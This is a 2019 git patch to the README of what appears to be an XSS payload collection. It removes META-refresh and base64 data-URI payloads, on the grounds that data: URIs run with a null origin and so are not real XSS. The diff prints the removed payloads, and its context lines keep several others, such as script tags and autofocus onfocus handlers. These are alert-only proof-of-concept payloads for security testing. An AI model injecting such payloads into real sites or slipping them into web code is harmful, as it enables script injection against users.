From 200a2d38d8625c2bc95710bb1e95bf86c754fb00 Mon Sep 17 00:00:00 2001
From: Anton Lopanitsyn <i@bo0om.ru>
Date: Mon, 11 Feb 2019 09:34:13 +0300
Subject: [PATCH] Fix fake xss

Actually, is not XSS.

Running scripts like <a href="data:text/html,<script>alert(location.origin)</script>">clickme</a> have location.origin "null".
---
 XSS injection/README.md | 18 ------------------
 1 file changed, 18 deletions(-)

diff --git a/XSS injection/README.md b/XSS injection/README.md
index ce68962..6169b46 100644
--- a/XSS injection/README.md	
+++ b/XSS injection/README.md	
@@ -122,18 +122,6 @@ you can also specify an arbitratry payload with 14.rs/#payload
 e.g: 14.rs/#alert(document.domain)
 ```
 
-XSS in META tag
-
-```javascript
-Base64 encoded
-<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
-
-<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
-
-With an additional URL
-<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
-```
-
 XSS in Hidden input
 
 ```javascript
@@ -162,12 +150,6 @@ URL/<script>alert('XSS');//
 URL/<input autofocus onfocus=alert(1)>
 ```
 
-XSS using base64 encoded href data in a link
-
-```
-<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ+" target="_blank">here</a>
-```
-
 ## XSS in wrappers javascript and data URI
 
 XSS with javascript: